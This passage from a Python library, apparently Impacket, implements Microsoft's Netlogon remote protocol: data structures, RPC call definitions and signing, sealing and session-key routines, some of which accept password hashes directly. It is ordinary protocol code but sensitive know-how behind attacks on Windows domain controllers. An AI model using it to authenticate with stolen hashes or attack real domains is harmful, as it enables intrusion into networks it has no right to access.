1244 |     referent = (
1245 |         ('Data', NETLOGON_DELTA_SECRET),
1246 |     )
1247 | 
1248 | # 2.2.1.5.26 NLPR_MODIFIED_COUNT
1249 | class NLPR_MODIFIED_COUNT(NDRSTRUCT):
1250 |     structure = (
1251 |         ('ModifiedCount', OLD_LARGE_INTEGER),
1252 |     )
1253 | 
1254 | class PNLPR_MODIFIED_COUNT(NDRPOINTER):
1255 |     referent = (
1256 |         ('Data', NLPR_MODIFIED_COUNT),
1257 |     )
1258 | 
1259 | # 2.2.1.5.28 NETLOGON_DELTA_TYPE
1260 | class NETLOGON_DELTA_TYPE(NDRENUM):
1261 |     class enumItems(Enum):
1262 |         AddOrChangeDomain     = 1
1263 |         AddOrChangeGroup      = 2
1264 |         DeleteGroup           = 3
1265 |         RenameGroup           = 4
1266 |         AddOrChangeUser       = 5
1267 |         DeleteUser            = 6
1268 |         RenameUser            = 7
1269 |         ChangeGroupMembership = 8
1270 |         AddOrChangeAlias      = 9
1271 |         DeleteAlias           = 10
1272 |         RenameAlias           = 11
1273 |         ChangeAliasMembership = 12
1274 |         AddOrChangeLsaPolicy  = 13
1275 |         AddOrChangeLsaTDomain = 14
1276 |         DeleteLsaTDomain      = 15
1277 |         AddOrChangeLsaAccount = 16
1278 |         DeleteLsaAccount      = 17
1279 |         AddOrChangeLsaSecret  = 18
1280 |         DeleteLsaSecret       = 19
1281 |         DeleteGroupByName     = 20
1282 |         DeleteUserByName      = 21
1283 |         SerialNumberSkip      = 22
1284 | 
1285 | # 2.2.1.5.27 NETLOGON_DELTA_UNION
1286 | class NETLOGON_DELTA_UNION(NDRUNION):
1287 |     union = {
1288 |         NETLOGON_DELTA_TYPE.AddOrChangeDomain     : ('DeltaDomain', PNETLOGON_DELTA_DOMAIN),
1289 |         NETLOGON_DELTA_TYPE.AddOrChangeGroup      : ('DeltaGroup', PNETLOGON_DELTA_GROUP),
1290 |         NETLOGON_DELTA_TYPE.RenameGroup           : ('DeltaRenameGroup', PNETLOGON_DELTA_RENAME_GROUP),
1291 |         NETLOGON_DELTA_TYPE.AddOrChangeUser       : ('DeltaUser', PNETLOGON_DELTA_USER),
1292 |         NETLOGON_DELTA_TYPE.RenameUser            : ('DeltaRenameUser', PNETLOGON_DELTA_RENAME_USER),
1293 |         NETLOGON_DELTA_TYPE.ChangeGroupMembership : ('DeltaGroupMember', PNETLOGON_DELTA_GROUP_MEMBER),
1294 |         NETLOGON_DELTA_TYPE.AddOrChangeAlias      : ('DeltaAlias', PNETLOGON_DELTA_ALIAS),
1295 |         NETLOGON_DELTA_TYPE.RenameAlias           : ('DeltaRenameAlias', PNETLOGON_DELTA_RENAME_ALIAS),
1296 |         NETLOGON_DELTA_TYPE.ChangeAliasMembership : ('DeltaAliasMember', PNETLOGON_DELTA_ALIAS_MEMBER),
1297 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaPolicy  : ('DeltaPolicy', PNETLOGON_DELTA_POLICY),
1298 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaTDomain : ('DeltaTDomains', PNETLOGON_DELTA_TRUSTED_DOMAINS),
1299 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaAccount : ('DeltaAccounts', PNETLOGON_DELTA_ACCOUNTS),
1300 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaSecret  : ('DeltaSecret', PNETLOGON_DELTA_SECRET),
1301 |         NETLOGON_DELTA_TYPE.DeleteGroupByName     : ('DeltaDeleteGroup', PNETLOGON_DELTA_DELETE_GROUP),
1302 |         NETLOGON_DELTA_TYPE.DeleteUserByName      : ('DeltaDeleteUser', PNETLOGON_DELTA_DELETE_USER),
1303 |         NETLOGON_DELTA_TYPE.SerialNumberSkip      : ('DeltaSerialNumberSkip', PNLPR_MODIFIED_COUNT),
1304 |     }
1305 | 
1306 | # 2.2.1.5.18 NETLOGON_DELTA_ID_UNION
1307 | class NETLOGON_DELTA_ID_UNION(NDRUNION):
1308 |     union = {
1309 |         NETLOGON_DELTA_TYPE.AddOrChangeDomain     : ('Rid', ULONG),
1310 |         NETLOGON_DELTA_TYPE.AddOrChangeGroup      : ('Rid', ULONG),
1311 |         NETLOGON_DELTA_TYPE.DeleteGroup           : ('Rid', ULONG),
1312 |         NETLOGON_DELTA_TYPE.RenameGroup           : ('Rid', ULONG),
1313 |         NETLOGON_DELTA_TYPE.AddOrChangeUser       : ('Rid', ULONG),
1314 |         NETLOGON_DELTA_TYPE.DeleteUser            : ('Rid', ULONG),
1315 |         NETLOGON_DELTA_TYPE.RenameUser            : ('Rid', ULONG),
1316 |         NETLOGON_DELTA_TYPE.ChangeGroupMembership : ('Rid', ULONG),
1317 |         NETLOGON_DELTA_TYPE.AddOrChangeAlias      : ('Rid', ULONG),
1318 |         NETLOGON_DELTA_TYPE.DeleteAlias           : ('Rid', ULONG),
1319 |         NETLOGON_DELTA_TYPE.RenameAlias           : ('Rid', ULONG),
1320 |         NETLOGON_DELTA_TYPE.ChangeAliasMembership : ('Rid', ULONG),
1321 |         NETLOGON_DELTA_TYPE.DeleteGroupByName     : ('Rid', ULONG),
1322 |         NETLOGON_DELTA_TYPE.DeleteUserByName      : ('Rid', ULONG),
1323 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaPolicy  : ('Sid', PRPC_SID),
1324 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaTDomain : ('Sid', PRPC_SID),
1325 |         NETLOGON_DELTA_TYPE.DeleteLsaTDomain      : ('Sid', PRPC_SID),
1326 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaAccount : ('Sid', PRPC_SID),
1327 |         NETLOGON_DELTA_TYPE.DeleteLsaAccount      : ('Sid', PRPC_SID),
1328 |         NETLOGON_DELTA_TYPE.AddOrChangeLsaSecret  : ('Name', LPWSTR),
1329 |         NETLOGON_DELTA_TYPE.DeleteLsaSecret       : ('Name', LPWSTR),
1330 |     }
1331 | 
1332 | # 2.2.1.5.11 NETLOGON_DELTA_ENUM
1333 | class NETLOGON_DELTA_ENUM(NDRSTRUCT):
1334 |     structure = (
1335 |         ('DeltaType', NETLOGON_DELTA_TYPE),
1336 |         ('DeltaID', NETLOGON_DELTA_ID_UNION),
1337 |         ('DeltaUnion', NETLOGON_DELTA_UNION),
1338 |     )
1339 | 
1340 | # 2.2.1.5.12 NETLOGON_DELTA_ENUM_ARRAY
1341 | class NETLOGON_DELTA_ENUM_ARRAY_ARRAY(NDRUniConformantArray):
1342 |     item = NETLOGON_DELTA_ENUM
1343 | 
1344 | class PNETLOGON_DELTA_ENUM_ARRAY_ARRAY(NDRSTRUCT):
1345 |     referent = (
1346 |         ('Data', NETLOGON_DELTA_ENUM_ARRAY_ARRAY),
1347 |     )
1348 | 
1349 | class PNETLOGON_DELTA_ENUM_ARRAY(NDRPOINTER):
1350 |     structure = (
1351 |         ('CountReturned', DWORD),
1352 |         ('Deltas', PNETLOGON_DELTA_ENUM_ARRAY_ARRAY),
1353 |     )
1354 | 
1355 | # 2.2.1.5.29 SYNC_STATE
1356 | class SYNC_STATE(NDRENUM):
1357 |     class enumItems(Enum):
1358 |         NormalState          = 0
1359 |         DomainState          = 1
1360 |         GroupState           = 2
1361 |         UasBuiltInGroupState = 3
1362 |         UserState            = 4
1363 |         GroupMemberState     = 5
1364 |         AliasState           = 6
1365 |         AliasMemberState     = 7
1366 |         SamDoneState         = 8
1367 | 
1368 | # 2.2.1.6.1 DOMAIN_NAME_BUFFER
1369 | class DOMAIN_NAME_BUFFER(NDRSTRUCT):
1370 |     structure = (
1371 |         ('DomainNameByteCount', ULONG),
1372 |         ('DomainNames', PUCHAR_ARRAY),
1373 |     )
1374 | 
1375 | # 2.2.1.6.2 DS_DOMAIN_TRUSTSW
1376 | class DS_DOMAIN_TRUSTSW(NDRSTRUCT):
1377 |     structure = (
1378 |         ('NetbiosDomainName', LPWSTR),
1379 |         ('DnsDomainName', LPWSTR),
1380 |         ('Flags', ULONG),
1381 |         ('ParentIndex', ULONG),
1382 |         ('TrustType', ULONG),
1383 |         ('TrustAttributes', ULONG),
1384 |         ('DomainSid', PRPC_SID),
1385 |         ('DomainGuid', GUID),
1386 |     )
1387 | 
1388 | # 2.2.1.6.3 NETLOGON_TRUSTED_DOMAIN_ARRAY
1389 | class DS_DOMAIN_TRUSTSW_ARRAY(NDRUniConformantArray):
1390 |     item = DS_DOMAIN_TRUSTSW
1391 | 
1392 | class PDS_DOMAIN_TRUSTSW_ARRAY(NDRPOINTER):
1393 |     referent = (
1394 |         ('Data', DS_DOMAIN_TRUSTSW_ARRAY),
1395 |     )
1396 | 
1397 | class NETLOGON_TRUSTED_DOMAIN_ARRAY(NDRSTRUCT):
1398 |     structure = (
1399 |         ('DomainCount', DWORD),
1400 |         ('Domains', PDS_DOMAIN_TRUSTSW_ARRAY),
1401 |     )
1402 | 
1403 | # 2.2.1.6.4 NL_GENERIC_RPC_DATA
1404 | class NL_GENERIC_RPC_DATA(NDRSTRUCT):
1405 |     structure = (
1406 |         ('UlongEntryCount', ULONG),
1407 |         ('UlongData', PULONG_ARRAY),
1408 |         ('UnicodeStringEntryCount', ULONG),
1409 |         ('UnicodeStringData', PRPC_UNICODE_STRING_ARRAY),
1410 |     )
1411 | 
1412 | class PNL_GENERIC_RPC_DATA(NDRPOINTER):
1413 |     referent = (
1414 |         ('Data', NL_GENERIC_RPC_DATA),
1415 |     )
1416 | 
1417 | # 2.2.1.7.1 NETLOGON_CONTROL_DATA_INFORMATION
1418 | class NETLOGON_CONTROL_DATA_INFORMATION(NDRUNION):
1419 |     commonHdr = (
1420 |         ('tag', DWORD),
1421 |     )
1422 | 
1423 |     union = {
1424 |         5 : ('TrustedDomainName', LPWSTR),
1425 |         6 : ('TrustedDomainName', LPWSTR),
1426 |         9 : ('TrustedDomainName', LPWSTR),
1427 |         10 : ('TrustedDomainName', LPWSTR),
1428 |         65534 : ('DebugFlag', DWORD),
1429 |         8: ('UserName', LPWSTR),
1430 |     }
1431 | 
1432 | # 2.2.1.7.2 NETLOGON_INFO_1
1433 | class NETLOGON_INFO_1(NDRSTRUCT):
1434 |     structure = (
1435 |         ('netlog1_flags', DWORD),
1436 |         ('netlog1_pdc_connection_status', NET_API_STATUS),
1437 |     )
1438 | 
1439 | class PNETLOGON_INFO_1(NDRPOINTER):
1440 |     referent = (
1441 |         ('Data', NETLOGON_INFO_1),
1442 |     )
1443 | 
1444 | # 2.2.1.7.3 NETLOGON_INFO_2
1445 | class NETLOGON_INFO_2(NDRSTRUCT):
1446 |     structure = (
1447 |         ('netlog2_flags', DWORD),
1448 |         ('netlog2_pdc_connection_status', NET_API_STATUS),
1449 |         ('netlog2_trusted_dc_name', LPWSTR),
1450 |         ('netlog2_tc_connection_status', NET_API_STATUS),
1451 |     )
1452 | 
1453 | class PNETLOGON_INFO_2(NDRPOINTER):
1454 |     referent = (
1455 |         ('Data', NETLOGON_INFO_2),
1456 |     )
1457 | 
1458 | # 2.2.1.7.4 NETLOGON_INFO_3
1459 | class NETLOGON_INFO_3(NDRSTRUCT):
1460 |     structure = (
1461 |         ('netlog3_flags', DWORD),
1462 |         ('netlog3_logon_attempts', DWORD),
1463 |         ('netlog3_reserved1', DWORD),
1464 |         ('netlog3_reserved2', DWORD),
1465 |         ('netlog3_reserved3', DWORD),
1466 |         ('netlog3_reserved4', DWORD),
1467 |         ('netlog3_reserved5', DWORD),
1468 |     )
1469 | 
1470 | class PNETLOGON_INFO_3(NDRPOINTER):
1471 |     referent = (
1472 |         ('Data', NETLOGON_INFO_3),
1473 |     )
1474 | 
1475 | # 2.2.1.7.5 NETLOGON_INFO_4
1476 | class NETLOGON_INFO_4(NDRSTRUCT):
1477 |     structure = (
1478 |         ('netlog4_trusted_dc_name', LPWSTR),
1479 |         ('netlog4_trusted_domain_name', LPWSTR),
1480 |     )
1481 | 
1482 | class PNETLOGON_INFO_4(NDRPOINTER):
1483 |     referent = (
1484 |         ('Data', NETLOGON_INFO_4),
1485 |     )
1486 | 
1487 | # 2.2.1.7.6 NETLOGON_CONTROL_QUERY_INFORMATION
1488 | class NETLOGON_CONTROL_QUERY_INFORMATION(NDRUNION):
1489 |     commonHdr = (
1490 |         ('tag', DWORD),
1491 |     )
1492 | 
1493 |     union = {
1494 |         1 : ('NetlogonInfo1', PNETLOGON_INFO_1),
1495 |         2 : ('NetlogonInfo2', PNETLOGON_INFO_2),
1496 |         3 : ('NetlogonInfo3', PNETLOGON_INFO_3),
1497 |         4 : ('NetlogonInfo4', PNETLOGON_INFO_4),
1498 |     }
1499 | 
1500 | # 2.2.1.8.1 NETLOGON_VALIDATION_UAS_INFO
1501 | class NETLOGON_VALIDATION_UAS_INFO(NDRSTRUCT):
1502 |     structure = (
1503 |         ('usrlog1_eff_name', DWORD),
1504 |         ('usrlog1_priv', DWORD),
1505 |         ('usrlog1_auth_flags', DWORD),
1506 |         ('usrlog1_num_logons', DWORD),
1507 |         ('usrlog1_bad_pw_count', DWORD),
1508 |         ('usrlog1_last_logon', DWORD),
1509 |         ('usrlog1_last_logoff', DWORD),
1510 |         ('usrlog1_logoff_time', DWORD),
1511 |         ('usrlog1_kickoff_time', DWORD),
1512 |         ('usrlog1_password_age', DWORD),
1513 |         ('usrlog1_pw_can_change', DWORD),
1514 |         ('usrlog1_pw_must_change', DWORD),
1515 |         ('usrlog1_computer', LPWSTR),
1516 |         ('usrlog1_domain', LPWSTR),
1517 |         ('usrlog1_script_path', LPWSTR),
1518 |         ('usrlog1_reserved1', DWORD),
1519 |     )
1520 | 
1521 | class PNETLOGON_VALIDATION_UAS_INFO(NDRPOINTER):
1522 |     referent = (
1523 |         ('Data', NETLOGON_VALIDATION_UAS_INFO),
1524 |     )
1525 | 
1526 | # 2.2.1.8.2 NETLOGON_LOGOFF_UAS_INFO
1527 | class NETLOGON_LOGOFF_UAS_INFO(NDRSTRUCT):
1528 |     structure = (
1529 |         ('Duration', DWORD),
1530 |         ('LogonCount', USHORT),
1531 |     )
1532 | 
1533 | # 2.2.1.8.3 UAS_INFO_0
1534 | class UAS_INFO_0(NDRSTRUCT):
1535 |     structure = (
1536 |         ('ComputerName', '16s=""'),
1537 |         ('TimeCreated', ULONG),
1538 |         ('SerialNumber', ULONG),
1539 |     )
1540 |     def getAlignment(self):
1541 |         return 4
1542 | 
1543 | # 2.2.1.8.4 NETLOGON_DUMMY1
1544 | class NETLOGON_DUMMY1(NDRUNION):
1545 |     commonHdr = (
1546 |         ('tag', DWORD),
1547 |     )
1548 | 
1549 |     union = {
1550 |         1 : ('Dummy', ULONG),
1551 |     }
1552 | 
1553 | # 3.5.4.8.2 NetrLogonComputeServerDigest (Opnum 24)
1554 | class CHAR_FIXED_16_ARRAY(NDRUniFixedArray):
1555 |     def getDataLen(self, data, offset=0):
1556 |         return 16
1557 | 
1558 | 
1559 | ################################################################################
1560 | # SSPI
1561 | ################################################################################
1562 | # Constants
1563 | NL_AUTH_MESSAGE_NETBIOS_DOMAIN        = 0x1
1564 | NL_AUTH_MESSAGE_NETBIOS_HOST          = 0x2
1565 | NL_AUTH_MESSAGE_DNS_DOMAIN            = 0x4
1566 | NL_AUTH_MESSAGE_DNS_HOST              = 0x8
1567 | NL_AUTH_MESSAGE_NETBIOS_HOST_UTF8     = 0x10
1568 | 
1569 | NL_AUTH_MESSAGE_REQUEST               = 0x0
1570 | NL_AUTH_MESSAGE_RESPONSE              = 0x1
1571 | 
1572 | NL_SIGNATURE_HMAC_MD5    = 0x77
1573 | NL_SIGNATURE_HMAC_SHA256 = 0x13
1574 | NL_SEAL_NOT_ENCRYPTED    = 0xffff
1575 | NL_SEAL_RC4              = 0x7A
1576 | NL_SEAL_AES128           = 0x1A
1577 | 
1578 | # Structures
1579 | class NL_AUTH_MESSAGE(Structure):
1580 |     structure = (
1581 |         ('MessageType','<L=0'),
1582 |         ('Flags','<L=0'),
1583 |         ('Buffer',':'),
1584 |     )
1585 |     def __init__(self, data = None, alignment = 0):
1586 |         Structure.__init__(self, data, alignment)
1587 |         if data is None:
1588 |             self['Buffer'] = b'\x00'*4
1589 | 
1590 | class NL_AUTH_SIGNATURE(Structure):
1591 |     structure = (
1592 |         ('SignatureAlgorithm','<H=0'),
1593 |         ('SealAlgorithm','<H=0'),
1594 |         ('Pad','<H=0xffff'),
1595 |         ('Flags','<H=0'),
1596 |         ('SequenceNumber','8s=""'),
1597 |         ('Checksum','8s=""'),
1598 |         ('_Confounder','_-Confounder','8'),
1599 |         ('Confounder',':'),
1600 |     )
1601 |     def __init__(self, data = None, alignment = 0):
1602 |         Structure.__init__(self, data, alignment)
1603 |         if data is None:
1604 |             self['Confounder'] = ''
1605 | 
1606 | class NL_AUTH_SHA2_SIGNATURE(Structure):
1607 |     structure = (
1608 |         ('SignatureAlgorithm','<H=0'),
1609 |         ('SealAlgorithm','<H=0'),
1610 |         ('Pad','<H=0xffff'),
1611 |         ('Flags','<H=0'),
1612 |         ('SequenceNumber','8s=""'),
1613 |         ('Checksum','32s=""'),
1614 |         ('_Confounder','_-Confounder','8'),
1615 |         ('Confounder',':'),
1616 |     )
1617 |     def __init__(self, data = None, alignment = 0):
1618 |         Structure.__init__(self, data, alignment)
1619 |         if data is None:
1620 |             self['Confounder'] = ''
1621 | 
1622 | # Section 3.1.4.4.2
1623 | def ComputeNetlogonCredential(inputData, Sk):
1624 |     k1 = Sk[:7]
1625 |     k3 = crypto.transformKey(k1)
1626 |     k2 = Sk[7:14]
1627 |     k4 = crypto.transformKey(k2)
1628 |     Crypt1 = DES.new(k3, DES.MODE_ECB)
1629 |     Crypt2 = DES.new(k4, DES.MODE_ECB)
1630 |     cipherText = Crypt1.encrypt(inputData)
1631 |     return Crypt2.encrypt(cipherText)
1632 | 
1633 | # Section 3.1.4.4.1
1634 | def ComputeNetlogonCredentialAES(inputData, Sk):
1635 |     IV='\x00'*16
1636 |     Crypt1 = AES.new(Sk, AES.MODE_CFB, IV)
1637 |     return Crypt1.encrypt(inputData)
1638 | 
1639 | # Section 3.1.4.3.1
1640 | def ComputeSessionKeyAES(sharedSecret, clientChallenge, serverChallenge, sharedSecretHash = None):
1641 |     # added the ability to receive hashes already
1642 |     if sharedSecretHash is None:
1643 |         M4SS = ntlm.NTOWFv1(sharedSecret)
1644 |     else:
1645 |         M4SS = sharedSecretHash
1646 | 
1647 |     hm = hmac.new(key=M4SS, digestmod=hashlib.sha256)
1648 |     hm.update(clientChallenge)
1649 |     hm.update(serverChallenge)
1650 |     sessionKey = hm.digest()
1651 | 
1652 |     return sessionKey[:16]
1653 | 
1654 | # 3.1.4.3.2 Strong-key Session-Key
1655 | def ComputeSessionKeyStrongKey(sharedSecret, clientChallenge, serverChallenge, sharedSecretHash = None):
1656 |     # added the ability to receive hashes already
1657 | 
1658 |     if sharedSecretHash is None:
1659 |         M4SS = ntlm.NTOWFv1(sharedSecret)
1660 |     else:
1661 |         M4SS = sharedSecretHash
1662 | 
1663 |     md5 = hashlib.new('md5')
1664 |     md5.update(b'\x00'*4)
1665 |     md5.update(clientChallenge)
1666 |     md5.update(serverChallenge)
1667 |     finalMD5 = md5.digest()
1668 |     hm = hmac.new(M4SS, digestmod=hashlib.md5)
1669 |     hm.update(finalMD5)
1670 |     return hm.digest()
1671 | 
1672 | def deriveSequenceNumber(sequenceNum):
1673 |     sequenceLow = sequenceNum & 0xffffffff
1674 |     sequenceHigh = (sequenceNum >> 32) & 0xffffffff
1675 |     sequenceHigh |= 0x80000000
1676 | 
1677 |     res = pack('>L', sequenceLow)
1678 |     res += pack('>L', sequenceHigh)
1679 |     return res
1680 | 
1681 | def ComputeNetlogonSignatureAES(authSignature, message, confounder, sessionKey):
1682 |     # [MS-NRPC] Section 3.3.4.2.1, point 7
1683 |     hm = hmac.new(key=sessionKey, digestmod=hashlib.sha256)
1684 |     hm.update(authSignature.getData()[:8])
1685 |     # If no confidentiality requested, it should be ''
1686 |     hm.update(confounder)
1687 |     hm.update(bytes(message))
1688 |     return hm.digest()[:8]+'\x00'*24
1689 | 
1690 | def ComputeNetlogonSignatureMD5(authSignature, message, confounder, sessionKey):
1691 |     # [MS-NRPC] Section 3.3.4.2.1, point 7
1692 |     md5 = hashlib.new('md5')
1693 |     md5.update(b'\x00'*4)
1694 |     md5.update(authSignature.getData()[:8])
1695 |     # If no confidentiality requested, it should be ''
1696 |     md5.update(confounder)
1697 |     md5.update(bytes(message))
1698 |     finalMD5 = md5.digest()
1699 |     hm = hmac.new(sessionKey, digestmod=hashlib.md5)
1700 |     hm.update(finalMD5)
1701 |     return hm.digest()[:8]
1702 | 
1703 | def encryptSequenceNumberRC4(sequenceNum, checkSum, sessionKey):
1704 |     # [MS-NRPC] Section 3.3.4.2.1, point 9
1705 | 
1706 |     hm = hmac.new(sessionKey, digestmod=hashlib.md5)
1707 |     hm.update(b'\x00'*4)
1708 |     hm2 = hmac.new(hm.digest(), digestmod=hashlib.md5)
1709 |     hm2.update(checkSum)
1710 |     encryptionKey = hm2.digest()
1711 | 
1712 |     cipher = ARC4.new(encryptionKey)
1713 |     return cipher.encrypt(sequenceNum)
1714 | 
1715 | def decryptSequenceNumberRC4(sequenceNum, checkSum, sessionKey):
1716 |     # [MS-NRPC] Section 3.3.4.2.2, point 5
1717 | 
1718 |     return encryptSequenceNumberRC4(sequenceNum, checkSum, sessionKey)
1719 | 
1720 | def encryptSequenceNumberAES(sequenceNum, checkSum, sessionKey):
1721 |     # [MS-NRPC] Section 3.3.4.2.1, point 9
1722 |     IV = checkSum[:8] + checkSum[:8]
1723 |     Cipher = AES.new(sessionKey, AES.MODE_CFB, IV)
1724 |     return Cipher.encrypt(sequenceNum)
1725 | 
1726 | def decryptSequenceNumberAES(sequenceNum, checkSum, sessionKey):
1727 |     # [MS-NRPC] Section 3.3.4.2.1, point 9
1728 |     IV = checkSum[:8] + checkSum[:8]
1729 |     Cipher = AES.new(sessionKey, AES.MODE_CFB, IV)
1730 |     return Cipher.decrypt(sequenceNum)
1731 | 
1732 | def SIGN(data, confounder, sequenceNum, key, aes = False):
1733 |     if aes is False:
1734 |         signature = NL_AUTH_SIGNATURE()
1735 |         signature['SignatureAlgorithm'] = NL_SIGNATURE_HMAC_MD5
1736 |         if confounder == '':
1737 |             signature['SealAlgorithm'] = NL_SEAL_NOT_ENCRYPTED
1738 |         else:
1739 |             signature['SealAlgorithm'] = NL_SEAL_RC4
1740 |         signature['Checksum'] = ComputeNetlogonSignatureMD5(signature, data, confounder, key)
1741 |         signature['SequenceNumber'] = encryptSequenceNumberRC4(deriveSequenceNumber(sequenceNum), signature['Checksum'], key)
1742 |         return signature
1743 |     else:
1744 |         signature = NL_AUTH_SIGNATURE()
1745 |         signature['SignatureAlgorithm'] = NL_SIGNATURE_HMAC_SHA256
1746 |         if confounder == '':
1747 |             signature['SealAlgorithm'] = NL_SEAL_NOT_ENCRYPTED
1748 |         else:
1749 |             signature['SealAlgorithm'] = NL_SEAL_AES128
1750 |         signature['Checksum'] = ComputeNetlogonSignatureAES(signature, data, confounder, key)
1751 |         signature['SequenceNumber'] = encryptSequenceNumberAES(deriveSequenceNumber(sequenceNum), signature['Checksum'], key)
1752 |         return signature
1753 | 
1754 | def SEAL(data, confounder, sequenceNum, key, aes = False):
1755 |     signature = SIGN(data, confounder, sequenceNum, key, aes)
1756 |     sequenceNum = deriveSequenceNumber(sequenceNum)
1757 | 
1758 |     XorKey = bytearray(key)
1759 |     for i in range(len(XorKey)):
1760 |         XorKey[i] = XorKey[i] ^ 0xf0
1761 | 
1762 |     XorKey = bytes(XorKey)
1763 | 
1764 |     if aes is False:
1765 |         hm = hmac.new(XorKey, digestmod=hashlib.md5)
1766 |         hm.update(b'\x00'*4)
1767 |         hm2 = hmac.new(hm.digest(), digestmod=hashlib.md5)
1768 |         hm2.update(sequenceNum)
1769 |         encryptionKey = hm2.digest()
1770 | 
1771 |         cipher = ARC4.new(encryptionKey)
1772 |         cfounder = cipher.encrypt(confounder)
1773 |         cipher = ARC4.new(encryptionKey)
1774 |         encrypted = cipher.encrypt(data)
1775 | 
1776 |         signature['Confounder'] = cfounder
1777 | 
1778 |         return encrypted, signature
1779 |     else:
1780 |         IV = sequenceNum + sequenceNum
1781 |         cipher = AES.new(XorKey, AES.MODE_CFB, IV)
1782 |         cfounder = cipher.encrypt(confounder)
1783 |         encrypted = cipher.encrypt(data)
1784 | 
1785 |         signature['Confounder'] = cfounder
1786 | 
1787 |         return encrypted, signature
1788 | 
1789 | def UNSEAL(data, auth_data, key, aes = False):
1790 |     auth_data = NL_AUTH_SIGNATURE(auth_data)
1791 |     XorKey = bytearray(key)
1792 |     for i in range(len(XorKey)):
1793 |         XorKey[i] = XorKey[i] ^ 0xf0
1794 | 
1795 |     XorKey = bytes(XorKey)
1796 | 
1797 |     if aes is False:
1798 |         sequenceNum = decryptSequenceNumberRC4(auth_data['SequenceNumber'], auth_data['Checksum'],  key)
1799 |         hm = hmac.new(XorKey, digestmod=hashlib.md5)
1800 |         hm.update(b'\x00'*4)
1801 |         hm2 = hmac.new(hm.digest(), digestmod=hashlib.md5)
1802 |         hm2.update(sequenceNum)
1803 |         encryptionKey = hm2.digest()
1804 | 
1805 |         cipher = ARC4.new(encryptionKey)
1806 |         cfounder = cipher.encrypt(auth_data['Confounder'])
1807 |         cipher = ARC4.new(encryptionKey)
1808 |         plain = cipher.encrypt(data)
1809 | 
1810 |         return plain, cfounder
1811 |     else:
1812 |         sequenceNum = decryptSequenceNumberAES(auth_data['SequenceNumber'], auth_data['Checksum'],  key)
1813 |         IV = sequenceNum + sequenceNum
1814 |         cipher = AES.new(XorKey, AES.MODE_CFB, IV)
1815 |         cfounder = cipher.decrypt(auth_data['Confounder'])
1816 |         plain = cipher.decrypt(data)
1817 |         return plain, cfounder
1818 | 
1819 | 
1820 | def getSSPType1(workstation='', domain='', signingRequired=False):
1821 |     auth = NL_AUTH_MESSAGE()
1822 |     auth['Flags'] = 0
1823 |     auth['Buffer'] = b''
1824 |     auth['Flags'] |= NL_AUTH_MESSAGE_NETBIOS_DOMAIN
1825 |     if domain != '':
1826 |         auth['Buffer'] = auth['Buffer'] + b(domain) + b'\x00'
1827 |     else:
1828 |         auth['Buffer'] += b'WORKGROUP\x00'
1829 | 
1830 |     auth['Flags'] |= NL_AUTH_MESSAGE_NETBIOS_HOST
1831 | 
1832 |     if workstation != '':
1833 |         auth['Buffer'] = auth['Buffer'] + b(workstation) + b'\x00'
1834 |     else:
1835 |         auth['Buffer'] += b'MYHOST\x00'
1836 | 
1837 |     auth['Flags'] |= NL_AUTH_MESSAGE_NETBIOS_HOST_UTF8
1838 | 
1839 |     if workstation != '':
1840 |         auth['Buffer'] += pack('<B',len(workstation)) + b(workstation) + b'\x00'
1841 |     else:
1842 |         auth['Buffer'] += b'\x06MYHOST\x00'
1843 | 
1844 |     return auth
1845 | 
1846 | ################################################################################
1847 | # RPC CALLS
1848 | ################################################################################
1849 | # 3.5.4.3.1 DsrGetDcNameEx2 (Opnum 34)
1850 | class DsrGetDcNameEx2(NDRCALL):
1851 |     opnum = 34
1852 |     structure = (
1853 |        ('ComputerName',PLOGONSRV_HANDLE),
1854 |        ('AccountName', LPWSTR),
1855 |        ('AllowableAccountControlBits', ULONG),
1856 |        ('DomainName',LPWSTR),
1857 |        ('DomainGuid',PGUID),
1858 |        ('SiteName',LPWSTR),
1859 |        ('Flags',ULONG),
1860 |     )
1861 | 
1862 | class DsrGetDcNameEx2Response(NDRCALL):
1863 |     structure = (
1864 |        ('DomainControllerInfo',PDOMAIN_CONTROLLER_INFOW),
1865 |        ('ErrorCode',NET_API_STATUS),
1866 |     )
1867 | 
1868 | # 3.5.4.3.2 DsrGetDcNameEx (Opnum 27)
1869 | class DsrGetDcNameEx(NDRCALL):
1870 |     opnum = 27
1871 |     structure = (
1872 |        ('ComputerName',PLOGONSRV_HANDLE),
1873 |        ('DomainName',LPWSTR),
1874 |        ('DomainGuid',PGUID),
1875 |        ('SiteName',LPWSTR),
1876 |        ('Flags',ULONG),
1877 |     )
1878 | 
1879 | class DsrGetDcNameExResponse(NDRCALL):
1880 |     structure = (
1881 |        ('DomainControllerInfo',PDOMAIN_CONTROLLER_INFOW),
1882 |        ('ErrorCode',NET_API_STATUS),
1883 |     )
1884 | 
1885 | # 3.5.4.3.3 DsrGetDcName (Opnum 20)
1886 | class DsrGetDcName(NDRCALL):
1887 |     opnum = 20
1888 |     structure = (
1889 |        ('ComputerName',PLOGONSRV_HANDLE),
1890 |        ('DomainName',LPWSTR),
1891 |        ('DomainGuid',PGUID),
1892 |        ('SiteGuid',PGUID),
1893 |        ('Flags',ULONG),
1894 |     )
1895 | 
1896 | class DsrGetDcNameResponse(NDRCALL):
1897 |     structure = (
1898 |        ('DomainControllerInfo',PDOMAIN_CONTROLLER_INFOW),
1899 |        ('ErrorCode',NET_API_STATUS),
1900 |     )
1901 | 
1902 | # 3.5.4.3.4 NetrGetDCName (Opnum 11)
1903 | class NetrGetDCName(NDRCALL):
1904 |     opnum = 11
1905 |     structure = (
1906 |        ('ServerName',LOGONSRV_HANDLE),
1907 |        ('DomainName',LPWSTR),
1908 |     )
1909 | 
1910 | class NetrGetDCNameResponse(NDRCALL):
1911 |     structure = (
1912 |        ('Buffer',LPWSTR),
1913 |        ('ErrorCode',NET_API_STATUS),
1914 |     )
1915 | 
1916 | # 3.5.4.3.5 NetrGetAnyDCName (Opnum 13)
1917 | class NetrGetAnyDCName(NDRCALL):
1918 |     opnum = 13
1919 |     structure = (
1920 |        ('ServerName',PLOGONSRV_HANDLE),
1921 |        ('DomainName',LPWSTR),
1922 |     )
1923 | 
1924 | class NetrGetAnyDCNameResponse(NDRCALL):
1925 |     structure = (
1926 |        ('Buffer',LPWSTR),
